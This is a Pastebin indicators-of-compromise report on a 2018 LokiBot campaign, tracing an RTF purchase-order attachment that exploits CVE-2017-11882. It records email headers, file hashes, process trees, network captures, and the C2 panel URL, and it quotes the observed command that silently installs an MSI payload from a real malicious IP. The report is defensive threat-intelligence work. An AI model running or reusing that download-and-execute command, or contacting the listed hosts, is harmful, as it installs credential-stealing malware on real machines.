SHARE
TWEET

#lokibot_151118

VRad Nov 15th, 2018 (edited) 375 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #LokiBot #11882 #MSI
  2.  
  3. https://pastebin.com/cqZg7kwr
  4.  
  5. previous_contacts:
  6. --------------
  7. 16/10/18    - https://pastebin.com/LPqjHUkQ
  8. 08/10/18    - https://pastebin.com/cZxQGbyq
  9. 01/10/18    - https://pastebin.com/AVWK3XsB
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_lokibot_161018/
  13.  
  14. attack_vector
  15. --------------
  16. email attach doc(RTF) > 11882 > EQNEDT32.EXE GET > msiexec.exe /i 34.244.180.39/oo.msi
  17.  
  18. email_headers
  19. --------------
  20. Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
  21. Received: from [::1] (port=48392 helo=server.sauditunnels.com)
  22.     by server.sauditunnels.com with esmtpa (Exim 4.91)
  23.     (envelope-from <meenakshi@uhlpharma.co.in>)
  24. Date: Thu, 15 Nov 2018 06:34:16 +0300
  25. From: PURCHASE <mshahbour@elayouty.com>
  26. To: undisclosed-recipients:;
  27. Subject: PURCHASE ORDER 25437
  28. X-Sender: meenakshi@uhlpharma.co.in
  29. User-Agent: Roundcube Webmail/1.3.6
  30.  
  31. files
  32. --------------
  33. SHA-256 1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513
  34. File name   DOC_ORDER25437.doc (!) RTF
  35. File size   265.34 KB
  36.  
  37. SHA-256 917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051
  38. File name   oo.msi
  39. File size   1.25 MB
  40.  
  41.  
  42. Denis O'Brien @Malwageddon:
  43. "If metadata doesn't lie, the RTF file was created back in Sep."
  44.  
  45. activity
  46. **************
  47.  
  48. cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180{.} 39/oo.msi /quiet
  49.  
  50. PL_GET:     34.244.180.39/oo.msi
  51.  
  52. C2:     188.225.27.43
  53.         h11p://sahakyanshn{.} com/baba1010/five/fre.php
  54.  
  55. netwrk
  56. --------------
  57. GET /oo.msi HTTP/1.1
  58. Connection: Keep-Alive
  59. Accept: */*
  60. User-Agent: Windows Installer
  61. Host: 34.244.180.39
  62.  
  63. 188.225.27.43   sahakyanshn{.} com  POST /baba1010/five/fre.php HTTP/1.0    Mozilla/4.08 (Charon; Inferno)
  64.  
  65. comp
  66. --------------
  67. msiexec.exe 440 TCP 34.244.180.39   80  SYN_SENT
  68. MSIF29F.tmp 3348    TCP 188.225.27.43   80  ESTABLISHED
  69. [System]    0   TCP 188.225.27.43   80  TIME_WAIT
  70.  
  71. proc
  72. --------------
  73. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  74. C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  75. C:\Windows\SysWOW64\msiexec.exe   /i http://34.244.180.39/oo.msi /quiet
  76. C:\Windows\system32\msiexec.exe /V
  77. "C:\Windows\Installer\MSIF29F.tmp"
  78.  
  79. persist
  80. --------------
  81. n/a
  82.  
  83. drop
  84. --------------
  85. C:\Windows\Installer\MSIF29F.tmp
  86. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
  87. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
  88.  
  89. # # #
  90. doc (RTF)   https://www.virustotal.com/#/file/1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513/details
  91.             https://iris-h.services/#/pages/report/3dd0fe53b7f1ade6765df8da45b8b7c2ae6ed41b
  92. msi     https://www.virustotal.com/#/file/917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051/details
  93.         https://analyze.intezer.com/#/analyses/3d6796ac-e098-4b61-aad7-3cc552dd2304
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top